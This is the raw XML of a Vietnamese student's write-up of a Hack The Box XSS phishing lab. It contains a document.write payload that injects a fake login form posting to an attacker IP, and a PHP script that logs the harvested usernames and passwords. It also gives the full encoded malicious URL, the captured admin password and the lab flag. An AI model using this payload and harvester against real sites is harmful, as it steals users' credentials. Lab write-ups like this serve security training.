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C4E9E" w14:textId="2F98D95F" w:rsidR="009E56DA" w:rsidRDefault="0078251B" w:rsidP="00EE460E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0078251B">
        <w:t> Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1C519" w14:textId="552B2FD0" w:rsidR="005359C1" w:rsidRDefault="005359C1" w:rsidP="005359C1">
      <w:r>
        <w:t xml:space="preserve">Ý tưởng : Đánh cắp thông tin người dùng bằng cách tạo 1 form đăng nhập bằng việc khai thác lỗ hổng XSS , Khi người dùng đăng nhập vào form đấy thì thông tin username và password sẽ được gửi về server của kẻ tấn công đang lắng nghe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B40FEF8" w14:textId="19F592B8" w:rsidR="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="00EE460E">
      <w:r>
        <w:t xml:space="preserve">Payload form mẫu khai thác </w:t>
      </w:r>
      <w:r w:rsidR="00133DA4">
        <w:t>XSs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE4712" w14:textId="0177C804" w:rsidR="00EE460E" w:rsidRDefault="00EE460E" w:rsidP="00EE460E">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689137CD" w14:textId="77777777" w:rsidR="00EE460E" w:rsidRPr="00EE460E" w:rsidRDefault="00EE460E" w:rsidP="00EE460E">
      <w:r w:rsidRPr="00EE460E">
        <w:t>document.write('&lt;h3&gt;Please login to continue&lt;/h3&gt;&lt;form action=http://OUR_IP&gt;&lt;input type="username" name="username" placeholder="Username"&gt;&lt;input type="password" name="password" placeholder="Password"&gt;&lt;input type="submit" name="submit" value="Login"&gt;&lt;/form&gt;');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8925D" w14:textId="6AA98630" w:rsidR="00EE460E" w:rsidRDefault="00EE460E" w:rsidP="00EE460E">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E5FDE3" w14:textId="5C7F68D9" w:rsidR="00133DA4" w:rsidRDefault="00133DA4" w:rsidP="00EE460E">
      <w:r>
        <w:t>Tệp index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3690EA" w14:textId="4C8711DA" w:rsidR="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="00EE460E">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BCC3FB" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB768C5" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t>if (isset($_GET['username']) &amp;&amp; isset($_GET['password'])) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B3FAF" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t xml:space="preserve">    $file = fopen("creds.txt", "a+");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E06E88D" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t xml:space="preserve">    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A144A1B" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t xml:space="preserve">    header("Location: http://SERVER_IP/phishing/index.php");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BC255" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t xml:space="preserve">    fclose($file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0AE629" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t xml:space="preserve">    exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592C7DF9" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE99373" w14:textId="77777777" w:rsidR="009B4D6D" w:rsidRPr="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="009B4D6D">
      <w:r w:rsidRPr="009B4D6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89B6F0" w14:textId="68C0A29C" w:rsidR="009B4D6D" w:rsidRDefault="009B4D6D" w:rsidP="00EE460E">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2450BB4C" w14:textId="7F42365A" w:rsidR="009E0D2E" w:rsidRDefault="009E0D2E" w:rsidP="00EE460E">
      <w:r>
        <w:t xml:space="preserve">Trang chủ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C2A3A" w14:textId="50D3467E" w:rsidR="009E0D2E" w:rsidRDefault="009E0D2E" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54441ED2" wp14:editId="2766AC9A">
            <wp:extent cx="5943600" cy="1832610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124228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28182" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1832610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="579873E5" w14:textId="71A1234C" w:rsidR="009E0D2E" w:rsidRDefault="009E0D2E" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD3FD11" wp14:editId="5F5FD9A7">
            <wp:extent cx="5943600" cy="1664970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1438521172"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21172" name="Picture 1" descr="A computer screen with white text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1664970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D8E6B" w14:textId="0CC98ABB" w:rsidR="009E0D2E" w:rsidRDefault="009E0D2E" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ADBE8D3" wp14:editId="44253859">
            <wp:extent cx="5943600" cy="2392045"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="7773081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308104" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2392045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3AFC68" w14:textId="00FF3044" w:rsidR="00EE1C7D" w:rsidRDefault="00EE1C7D" w:rsidP="00EE460E">
      <w:r>
        <w:t xml:space="preserve">Ta sử dụng payload </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D48EC" w14:textId="487DAD5E" w:rsidR="00EE1C7D" w:rsidRDefault="00EE1C7D" w:rsidP="00EE460E">
      <w:r>
        <w:t>```</w:t>
      </w:r>
      <w:r w:rsidR="00CA0D13">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470CF212" w14:textId="5A5415C7" w:rsidR="0066401F" w:rsidRDefault="00A2286E" w:rsidP="0066401F">
      <w:r w:rsidRPr="00A2286E">
        <w:t>document.write('&lt;h3&gt;Please login to continue&lt;/h3&gt;&lt;form action=http://</w:t>
      </w:r>
      <w:r>
        <w:t>10.10.15.37</w:t>
      </w:r>
      <w:r w:rsidRPr="00A2286E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A2286E">
        <w:t>&gt;&lt;input type="username" name="username" placeholder="Username"&gt;&lt;input type="password" name="password" placeholder="Password"&gt;&lt;input type="submit" name="submit" value="Login"&gt;&lt;/form&gt;');</w:t>
      </w:r>
      <w:r w:rsidR="0066401F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C5F467"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0066401F" w:rsidRPr="0066401F">
        <w:t>document.getElementById('urlform').remove();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A6956B" w14:textId="099CF6E8" w:rsidR="005A4B7C" w:rsidRDefault="0066401F" w:rsidP="0066401F">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B218C10" w14:textId="65B8D7C7" w:rsidR="00231C71" w:rsidRDefault="003F64F2" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ABDA64B" wp14:editId="225A9F46">
            <wp:extent cx="5943600" cy="2251075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1387684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84179" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2251075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="160EDF4A" w14:textId="73AADA8D" w:rsidR="005C0C5D" w:rsidRDefault="005C0C5D" w:rsidP="00EE460E">
      <w:r>
        <w:t>```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6987CC5C" w14:textId="77DD9C60" w:rsidR="003F64F2" w:rsidRDefault="003F64F2" w:rsidP="00EE460E">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00D504C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.129.204.15/phishing/index.php?url=document.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.37+%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29%3B+document.getElementById%28%27urlform%27%29.remove%28%29%3B</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E3DEC46" w14:textId="75196014" w:rsidR="005C0C5D" w:rsidRDefault="005C0C5D" w:rsidP="00EE460E">
      <w:r>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671BE9E8" w14:textId="65280827" w:rsidR="005C0C5D" w:rsidRDefault="005C0C5D" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BCDA9E4" wp14:editId="55AB6ED4">
            <wp:extent cx="5943600" cy="1523365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="502206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206847" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1523365"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E0348" w14:textId="7D252E61" w:rsidR="003F64F2" w:rsidRDefault="003F64F2" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="167142BE" wp14:editId="4F110D8B">
            <wp:extent cx="5943600" cy="3034030"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6228930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93098" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3034030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64959E87" w14:textId="23BC6F10" w:rsidR="00405797" w:rsidRDefault="00405797" w:rsidP="00EE460E">
      <w:r w:rsidRPr="00405797">
        <w:t>username=admin&amp;password=p1zd0nt57341myp455</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD3ECCF" w14:textId="037022FE" w:rsidR="00405797" w:rsidRDefault="00405797" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FFB113C" wp14:editId="6919B669">
            <wp:extent cx="5943600" cy="2593340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="368173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73350" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2593340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4EC3B" w14:textId="27B722AC" w:rsidR="007700CF" w:rsidRDefault="007700CF" w:rsidP="00EE460E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37B9E4E5" wp14:editId="05511671">
            <wp:extent cx="5943600" cy="1510665"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="248649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49645" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1510665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E42733" w14:textId="1BAD7DBB" w:rsidR="00D64C3D" w:rsidRDefault="00D64C3D" w:rsidP="00EE460E">
      <w:r>
        <w:t>P/s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D64C3D">
        <w:t xml:space="preserve"> HTB{r3f13c73d_cr3d5_84ck_2_m3}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D64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58182A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B161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897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DA"/>
    <w:rsid w:val="00014465"/>
    <w:rsid w:val="00133DA4"/>
    <w:rsid w:val="00231C71"/>
    <w:rsid w:val="003F64F2"/>
    <w:rsid w:val="00405797"/>
    <w:rsid w:val="005359C1"/>
    <w:rsid w:val="005A4B7C"/>
    <w:rsid w:val="005C0C5D"/>
    <w:rsid w:val="0066401F"/>
    <w:rsid w:val="007700CF"/>
    <w:rsid w:val="0078251B"/>
    <w:rsid w:val="009B4D6D"/>
    <w:rsid w:val="009E0D2E"/>
    <w:rsid w:val="009E56DA"/>
    <w:rsid w:val="00A2286E"/>
    <w:rsid w:val="00C82755"/>
    <w:rsid w:val="00CA0D13"/>
    <w:rsid w:val="00CE2A1C"/>
    <w:rsid w:val="00D64C3D"/>
    <w:rsid w:val="00EE1C7D"/>
    <w:rsid w:val="00EE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5287"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D5A201F7-2F81-4024-82F2-28C89954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6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56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5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5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5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56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6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6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6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6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56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56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56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5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56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5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56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56DA"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="009E56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56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5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6DA"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="009E56DA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009E56DA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009E56DA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="009E5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56DA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009E56D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6401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01F"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F64F2"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003F64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44768">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="343627926">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="579142765">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="740908805">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="793791800">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="794720273">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1469979046">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="17767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10.129.204.15/phishing/index.php?url=document.write%28%27%3Ch3%3EPlease+login+to+continue%3C%2Fh3%3E%3Cform+action%3Dhttp%3A%2F%2F10.10.15.37+%3E%3Cinput+type%3D%22username%22+name%3D%22username%22+placeholder%3D%22Username%22%3E%3Cinput+type%3D%22password%22+name%3D%22password%22+placeholder%3D%22Password%22%3E%3Cinput+type%3D%22submit%22+name%3D%22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%27%29%3B+document.getElementById%28%27urlform%27%29.remove%28%29%3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Khanh D21AT03</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ly Quoc Khanh D21AT03</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-04T12:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-04T13:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>